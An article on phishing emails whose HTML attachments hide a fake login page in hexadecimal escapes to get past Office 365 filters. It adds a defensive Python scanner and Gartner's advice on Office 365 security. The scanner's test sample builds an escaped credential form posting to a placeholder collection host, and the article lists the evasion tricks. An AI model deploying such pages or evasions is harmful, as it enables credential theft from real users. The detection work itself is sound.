Cybercriminals are increasingly leveraging hexadecimal escape characters, a sophisticated type of character encoding, to bypass Microsoft Office 365 security protocols, according to cloud security platform provider Avanan.
With hexadecimal escape characters, cybercriminals can launch a phishing attack that uses an HTML attachment with a JavaScript snippet, according to Avanan. Malicious content is encoded in hexadecimal escape characters, ensuring no links are visible, Avanan said.
When an HTML attachment is opened, it presents a locally generated phishing page with login instructions, Avanan noted in a blog post. If users enter their credentials and click the submit button, they instantly send their information to hackers.
Ultimately, several factors make a phishing attack that uses hexadecimal escape characters unique, Avanan stated. These factors include:
- If a user scans a malicious HTML file with most antivirus solutions or emulates the file in most sandboxes, the file is not identified as malicious.
- The HTML file includes a submit button, and most sandboxes do not consider an HTML file with a submit button to be malicious.
- The email body itself contains no links, which negates many of the "safe-link" methods used by Microsoft and other security vendors.
- The fake "login" screen is local; this means nothing is sent or received until a user clicks "submit," and firewalls and browser plugins that use URL reputation for IDs and domains are rendered useless.
A phishing attack that uses hexadecimal escape characters can bypass most security tools, including Office 365's default security, Avanan pointed out. However, Avanan stated that organizations that use anti-phishing machine learning technologies may be better equipped than others to identify and address this type of attack, along with many other cyber threats.
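For defenders, the attachment described above can be inspected by decoding the escapes before looking for links and login forms. The following is an added example, not code from Avanan or Microsoft: the function names, the threshold of 20 escapes, the sample attachment and the `collector.example.invalid` URL are all constructed for illustration, and the decoder also covers the `%NN` and `\u00NN` forms as a generalization.

```python
import re

# \xNN, %NN and \u00NN escapes as they appear inside JavaScript string literals
HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})|%([0-9a-fA-F]{2})|\\u00([0-9a-fA-F]{2})')
SCRIPT = re.compile(r'<script\b[^>]*>(.*?)</script\s*>', re.I | re.S)
URL = re.compile(r'https?://[^\s"\'<>\\]+', re.I)
INDICATORS = ('<form', 'type="password"', "type='password'", 'type=password')


def decode_hex_escapes(text):
    """Replace each hex escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2) or m.group(3), 16)), text)


def scan_html_attachment(html, min_escapes=20):
    """Report what an HTML attachment hides behind hex escapes in its scripts."""
    report = {'escape_count': 0, 'hidden_urls': [], 'hidden_indicators': [], 'suspicious': False}
    visible_urls = set(URL.findall(html))  # links a plain-text scan would already see
    for body in SCRIPT.findall(html):
        report['escape_count'] += len(HEX_ESCAPE.findall(body))
        decoded = decode_hex_escapes(body)
        # Keep only URLs and login-form markup that exist solely after decoding
        for url in URL.findall(decoded):
            if url not in visible_urls and url not in report['hidden_urls']:
                report['hidden_urls'].append(url)
        low_raw, low_dec = body.lower(), decoded.lower()
        for ind in INDICATORS:
            if ind in low_dec and ind not in low_raw and ind not in report['hidden_indicators']:
                report['hidden_indicators'].append(ind)
    report['suspicious'] = (report['escape_count'] >= min_escapes
                            and bool(report['hidden_urls'] or report['hidden_indicators']))
    return report


def hex_escape(s):
    """Build constructed sample input: every character written as \\xNN."""
    return ''.join('\\x%02x' % ord(c) for c in s)


# Constructed samples: a minimal escaped login form with a placeholder URL, and a benign script.
SAMPLE_PAGE = ('<form action="https://collector.example.invalid/post">'
               '<input type="password" name="p"><input type="submit"></form>')
SAMPLE_ATTACHMENT = ('<html><body><script>document.write("' + hex_escape(SAMPLE_PAGE) +
                     '");</script></body></html>')
BENIGN_ATTACHMENT = '<html><body><script>var t = "caf\\xe9";</script></body></html>'

if __name__ == '__main__':
    print(scan_html_attachment(SAMPLE_ATTACHMENT))
```

Requiring both a high escape count and content that appears only after decoding keeps scripts with an occasional escaped character, such as the benign sample, from being flagged.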
Gartner's Advice on Office 365 Security
Expect the number of Office 365 deployments – and demand for advanced Office 365 security solutions – to increase over the next few years, according to Gartner.
The technology research firm has predicted Office 365 deployments that rely on third-party tools to fill gaps in security and compliance will increase from 15 percent last year to 40 percent in 2018. In addition, Gartner has projected 50 percent of organizations using Office 365 will rely on non-Microsoft security tools to maintain consistent security policies across their multivendor "SaaSscape" by 2020.
To help organizations secure Office 365 environments, Gartner offered the following recommendations:
- Determine whether Microsoft's native capabilities are sufficient.
- Examine third-party alternatives when security gaps prevent an organization from implementing effective security policies.
- Deploy an identity, access and privilege management strategy.
- Implement visibility, data security, threat protection and device management controls using native Office 365 capabilities.
- Collaborate with a cloud access security broker to develop consistent security policies across all Office 365 services and non-Microsoft SaaS applications.
Also, IT security teams should create a framework to evaluate Office 365 security controls, Gartner stated. This framework enables IT security teams to take a proactive approach to mitigate Office 365 threats, Gartner said, and identify opportunities for future enhancements with third-party tools.